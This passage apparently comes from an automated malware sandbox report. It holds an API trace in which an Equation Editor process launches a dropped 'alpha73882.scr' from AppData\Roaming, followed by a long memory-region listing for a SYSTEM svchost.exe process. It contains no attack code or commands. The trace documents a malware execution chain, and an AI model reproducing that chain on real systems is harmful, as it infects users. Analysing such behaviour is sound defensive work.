lpStartupInfo=0x19efac | out: lpStartupInfo=0x19efac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\"", dwX=0x28, dwY=0x28, dwXSize=0x50, dwYSize=0x28, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x19f070, hStdOutput=0x19f2ac, hStdError=0x682ac8)) [0159.416] GetProcAddress (hModule=0x76b60000, lpProcName="CreateProcessW") returned 0x76b7b000 [0159.416] CreateProcessW (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\alpha73882.scr", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19efac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\"", dwX=0x28, dwY=0x28, dwXSize=0x50, dwYSize=0x28, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x19f070, hStdOutput=0x19f2ac, hStdError=0x682ac8), lpProcessInformation=0x19eff0 | out: lpCommandLine=0x0, lpProcessInformation=0x19eff0*(hProcess=0x528, hThread=0x520, dwProcessId=0xe48, dwThreadId=0xe4c)) returned 1 [0159.545] GetProcAddress (hModule=0x76b60000, lpProcName="ExitProcess") returned 0x76b87b30 [0159.545] ExitProcess (uExitCode=0x0) Thread: id = 58 os_tid = 0xde8 Thread: id = 59 os_tid = 0xd4c Thread: id = 60 os_tid = 0xe00 Thread: id = 61 os_tid = 0xe04 Thread: id = 62 os_tid = 0xe18 Thread: id = 63 os_tid = 0xe2c Thread: id = 64 os_tid = 0xe30 Thread: id = 65 os_tid = 0xe34 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x73b28000" os_pid = "0x3f4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x210" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d04b" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1269 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1270 start_va = 0xe2a9870000 end_va = 0xe2a98effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2a9870000" filename = "" Region: id = 1271 start_va = 0xe2a9a00000 end_va = 0xe2a9bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2a9a00000" filename = "" Region: id = 1272 start_va = 0xe2a9d00000 end_va = 0xe2a9dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2a9d00000" filename = "" Region: id = 1273 start_va = 0xe2a9e00000 end_va = 0xe2a9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2a9e00000" filename = "" Region: id = 1274 start_va = 0xe2a9f00000 end_va = 0xe2a9ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2a9f00000" filename = "" Region: id = 1275 start_va = 0xe2aa100000 end_va = 0xe2aa1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa100000" filename = "" Region: id = 1276 start_va = 0xe2aa200000 end_va = 0xe2aa2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa200000" filename = "" Region: id = 1277 start_va = 0xe2aa500000 end_va = 0xe2aa5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa500000" filename = "" Region: id = 1278 start_va = 0xe2aa600000 end_va = 0xe2aa6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa600000" filename = "" Region: id = 1279 start_va = 0xe2aa700000 end_va = 0xe2aa77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa700000" filename = "" Region: id = 1280 start_va = 0xe2aa780000 end_va = 0xe2aa87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa780000" filename = "" Region: id = 1281 start_va = 0xe2aa880000 end_va = 0xe2aa97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa880000" filename = "" Region: id = 1282 start_va = 0xe2aa980000 end_va = 0xe2aaa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aa980000" filename = "" Region: id = 1283 start_va = 0xe2aaa80000 end_va = 0xe2aaafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aaa80000" filename = "" Region: id = 1284 start_va = 0xe2aac00000 end_va = 0xe2aacfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aac00000" filename = "" Region: id = 1285 start_va = 0xe2aad00000 end_va = 0xe2aadfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aad00000" filename = "" Region: id = 1286 start_va = 0xe2aae00000 end_va = 0xe2aaefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aae00000" filename = "" Region: id = 1287 start_va = 0xe2aaf00000 end_va = 0xe2aaffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aaf00000" filename = "" Region: id = 1288 start_va = 0xe2ab000000 end_va = 0xe2ab0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ab000000" filename = "" Region: id = 1289 start_va = 0xe2ab100000 end_va = 0xe2ab1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ab100000" filename = "" Region: id = 1290 start_va = 0xe2ab400000 end_va = 0xe2ab4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ab400000" filename = "" Region: id = 1291 start_va = 0xe2ab500000 end_va = 0xe2ab5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ab500000" filename = "" Region: id = 1292 start_va = 0xe2ab700000 end_va = 0xe2ab7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ab700000" filename = "" Region: id = 1293 start_va = 0xe2ab800000 end_va = 0xe2ab8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ab800000" filename = "" Region: id = 1294 start_va = 0xe2abb00000 end_va = 0xe2abbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2abb00000" filename = "" Region: id = 1295 start_va = 0xe2abd00000 end_va = 0xe2abd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2abd00000" filename = "" Region: id = 1296 start_va = 0xe2abf80000 end_va = 0xe2abffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2abf80000" filename = "" Region: id = 1297 start_va = 0xe2ac300000 end_va = 0xe2ac3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ac300000" filename = "" Region: id = 1298 start_va = 0xe2ac400000 end_va = 0xe2ac4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ac400000" filename = "" Region: id = 1299 start_va = 0xe2ac500000 end_va = 0xe2ac5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ac500000" filename = "" Region: id = 1300 start_va = 0xe2ac680000 end_va = 0xe2ac77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ac680000" filename = "" Region: id = 1301 start_va = 0xe2ac780000 end_va = 0xe2ac87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ac780000" filename = "" Region: id = 1302 start_va = 0xe2ac880000 end_va = 0xe2ac97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ac880000" filename = "" Region: id = 1303 start_va = 0xe2ac980000 end_va = 0xe2aca7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ac980000" filename = "" Region: id = 1304 start_va = 0xe2ace80000 end_va = 0xe2acf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ace80000" filename = "" Region: id = 1305 start_va = 0xe2acf80000 end_va = 0xe2ad07ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2acf80000" filename = "" Region: id = 1306 start_va = 0xe2ad080000 end_va = 0xe2ad17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ad080000" filename = "" Region: id = 1307 start_va = 0xe2ad180000 end_va = 0xe2ad27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ad180000" filename = "" Region: id = 1308 start_va = 0xe2ad480000 end_va = 0xe2ad57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ad480000" filename = "" Region: id = 1309 start_va = 0xe2ad580000 end_va = 0xe2ad67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ad580000" filename = "" Region: id = 1310 start_va = 0xe2ad780000 end_va = 0xe2ad87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ad780000" filename = "" Region: id = 1311 start_va = 0xe2ad880000 end_va = 0xe2ad97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ad880000" filename = "" Region: id = 1312 start_va = 0xe2ae280000 end_va = 0xe2ae37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae280000" filename = "" Region: id = 1313 start_va = 0xe2ae380000 end_va = 0xe2ae3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae380000" filename = "" Region: id = 1314 start_va = 0xe2ae400000 end_va = 0xe2ae47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae400000" filename = "" Region: id = 1315 start_va = 0xe2ae500000 end_va = 0xe2ae5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae500000" filename = "" Region: id = 1316 start_va = 0xe2ae600000 end_va = 0xe2ae6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae600000" filename = "" Region: id = 1317 start_va = 0xe2ae700000 end_va = 0xe2ae7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae700000" filename = "" Region: id = 1318 start_va = 0xe2ae800000 end_va = 0xe2ae87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae800000" filename = "" Region: id = 1319 start_va = 0xe2ae880000 end_va = 0xe2ae8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae880000" filename = "" Region: id = 1320 start_va = 0xe2ae900000 end_va = 0xe2ae9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2ae900000" filename = "" Region: id = 1321 start_va = 0xe2aea00000 end_va = 0xe2aeafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aea00000" filename = "" Region: id = 1322 start_va = 0xe2aeb00000 end_va = 0xe2aebfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aeb00000" filename = "" Region: id = 1323 start_va = 0xe2aed00000 end_va = 0xe2aedfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aed00000" filename = "" Region: id = 1324 start_va = 0xe2aee00000 end_va = 0xe2aeefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aee00000" filename = "" Region: id = 1325 start_va = 0xe2aef00000 end_va = 0xe2aeffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aef00000" filename = "" Region: id = 1326 start_va = 0xe2af000000 end_va = 0xe2af0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af000000" filename = "" Region: id = 1327 start_va = 0xe2af100000 end_va = 0xe2af17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af100000" filename = "" Region: id = 1328 start_va = 0xe2af180000 end_va = 0xe2af27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af180000" filename = "" Region: id = 1329 start_va = 0xe2af280000 end_va = 0xe2af37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af280000" filename = "" Region: id = 1330 start_va = 0xe2af380000 end_va = 0xe2af47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af380000" filename = "" Region: id = 1331 start_va = 0xe2af480000 end_va = 0xe2af57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af480000" filename = "" Region: id = 1332 start_va = 0xe2af680000 end_va = 0xe2af77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af680000" filename = "" Region: id = 1333 start_va = 0xe2af780000 end_va = 0xe2af87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af780000" filename = "" Region: id = 1334 start_va = 0xe2af880000 end_va = 0xe2af97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af880000" filename = "" Region: id = 1335 start_va = 0xe2af980000 end_va = 0xe2afa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2af980000" filename = "" Region: id = 1336 start_va = 0xe2afa80000 end_va = 0xe2afb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2afa80000" filename = "" Region: id = 1337 start_va = 0xe2afc80000 end_va = 0xe2afcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2afc80000" filename = "" Region: id = 1338 start_va = 0xe2afd00000 end_va = 0xe2afd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2afd00000" filename = "" Region: id = 1339 start_va = 0xe2afd80000 end_va = 0xe2afdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2afd80000" filename = "" Region: id = 1340 start_va = 0xe2afe00000 end_va = 0xe2afefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2afe00000" filename = "" Region: id = 1341 start_va = 0xe2aff00000 end_va = 0xe2aff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2aff00000" filename = "" Region: id = 1342 start_va = 0xe2b0080000 end_va = 0xe2b017ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0080000" filename = "" Region: id = 1343 start_va = 0xe2b0180000 end_va = 0xe2b027ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0180000" filename = "" Region: id = 1344 start_va = 0xe2b0380000 end_va = 0xe2b03fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0380000" filename = "" Region: id = 1345 start_va = 0xe2b0500000 end_va = 0xe2b05fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0500000" filename = "" Region: id = 1346 start_va = 0xe2b0800000 end_va = 0xe2b08fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0800000" filename = "" Region: id = 1347 start_va = 0xe2b0900000 end_va = 0xe2b09fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0900000" filename = "" Region: id = 1348 start_va = 0xe2b0a00000 end_va = 0xe2b0afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0a00000" filename = "" Region: id = 1349 start_va = 0xe2b0c00000 end_va = 0xe2b0cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0c00000" filename = "" Region: id = 1350 start_va = 0xe2b0f00000 end_va = 0xe2b0f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b0f00000" filename = "" Region: id = 1351 start_va = 0xe2b2800000 end_va = 0xe2b28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2800000" filename = "" Region: id = 1352 start_va = 0xe2b2900000 end_va = 0xe2b29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2900000" filename = "" Region: id = 1353 start_va = 0xe2b2a00000 end_va = 0xe2b2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000e2b2a00000" filename = "" Region: id = 1354 start_va = 0x24739000000 end_va = 0x2473900ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739000000" filename = "" Region: id = 1355 start_va = 0x24739010000 end_va = 0x24739010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1356 start_va = 0x24739020000 end_va = 0x24739034fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739020000" filename = "" Region: id = 1357 start_va = 0x24739040000 end_va = 0x24739043fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739040000" filename = "" Region: id = 1358 start_va = 0x24739050000 end_va = 0x24739050fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739050000" filename = "" Region: id = 1359 start_va = 0x24739060000 end_va = 0x24739061fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739060000" filename = "" Region: id = 1360 start_va = 0x24739070000 end_va = 0x24739070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739070000" filename = "" Region: id = 1361 start_va = 0x24739080000 end_va = 0x24739080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739080000" filename = "" Region: id = 1362 start_va = 0x24739090000 end_va = 0x24739090fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739090000" filename = "" Region: id = 1363 start_va = 0x247390a0000 end_va = 0x247390a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247390a0000" filename = "" Region: id = 1364 start_va = 0x247390b0000 end_va = 0x247390b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247390b0000" filename = "" Region: id = 1365 start_va = 0x247390c0000 end_va = 0x247390c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247390c0000" filename = "" Region: id = 1366 start_va = 0x247390d0000 end_va = 0x247390dcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1367 start_va = 0x247390e0000 end_va = 0x247390e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247390e0000" filename = "" Region: id = 1368 start_va = 0x247390f0000 end_va = 0x247390fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 1369 start_va = 0x24739100000 end_va = 0x24739106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739100000" filename = "" Region: id = 1370 start_va = 0x24739110000 end_va = 0x247391cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1371 start_va = 0x247391d0000 end_va = 0x247391d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247391d0000" filename = "" Region: id = 1372 start_va = 0x247391e0000 end_va = 0x247391e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1373 start_va = 0x247391f0000 end_va = 0x247391f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1374 start_va = 0x24739200000 end_va = 0x247392fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739200000" filename = "" Region: id = 1375 start_va = 0x24739300000 end_va = 0x24739487fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739300000" filename = "" Region: id = 1376 start_va = 0x24739490000 end_va = 0x247394d4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 1377 start_va = 0x247394e0000 end_va = 0x247394e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247394e0000" filename = "" Region: id = 1378 start_va = 0x247394f0000 end_va = 0x247394f1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1379 start_va = 0x24739500000 end_va = 0x247395fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739500000" filename = "" Region: id = 1380 start_va = 0x24739600000 end_va = 0x24739780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739600000" filename = "" Region: id = 1381 start_va = 0x24739790000 end_va = 0x2473984ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739790000" filename = "" Region: id = 1382 start_va = 0x24739850000 end_va = 0x24739860fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1383 start_va = 0x24739870000 end_va = 0x24739871fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739870000" filename = "" Region: id = 1384 start_va = 0x24739880000 end_va = 0x24739881fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1385 start_va = 0x24739890000 end_va = 0x24739894fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1386 start_va = 0x247398a0000 end_va = 0x247398a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1387 start_va = 0x247398b0000 end_va = 0x247398b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247398b0000" filename = "" Region: id = 1388 start_va = 0x247398c0000 end_va = 0x247398c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247398c0000" filename = "" Region: id = 1389 start_va = 0x247398d0000 end_va = 0x247398d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 1390 start_va = 0x247398e0000 end_va = 0x247398e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247398e0000" filename = "" Region: id = 1391 start_va = 0x247398f0000 end_va = 0x247398fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1392 start_va = 0x24739900000 end_va = 0x247399fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739900000" filename = "" Region: id = 1393 start_va = 0x24739a00000 end_va = 0x24739a8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1394 start_va = 0x24739a90000 end_va = 0x24739a92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1395 start_va = 0x24739aa0000 end_va = 0x24739aa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739aa0000" filename = "" Region: id = 1396 start_va = 0x24739ab0000 end_va = 0x24739ab1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739ab0000" filename = "" Region: id = 1397 start_va = 0x24739ac0000 end_va = 0x24739ac9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 1398 start_va = 0x24739ad0000 end_va = 0x24739ae0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1399 start_va = 0x24739af0000 end_va = 0x24739af1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024739af0000" filename = "" Region: id = 1400 start_va = 0x24739b00000 end_va = 0x24739bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739b00000" filename = "" Region: id = 1401 start_va = 0x24739c00000 end_va = 0x24739f36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1402 start_va = 0x24739f40000 end_va = 0x2473a03ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024739f40000" filename = "" Region: id = 1403 start_va = 0x2473a040000 end_va = 0x2473a050fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1404 start_va = 0x2473a060000 end_va = 0x2473a070fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1405 start_va = 0x2473a080000 end_va = 0x2473a090fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1406 start_va = 0x2473a0a0000 end_va = 0x2473a0b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1407 start_va = 0x2473a0c0000 end_va = 0x2473a0d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1408 start_va = 0x2473a0e0000 end_va = 0x2473a0f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1409 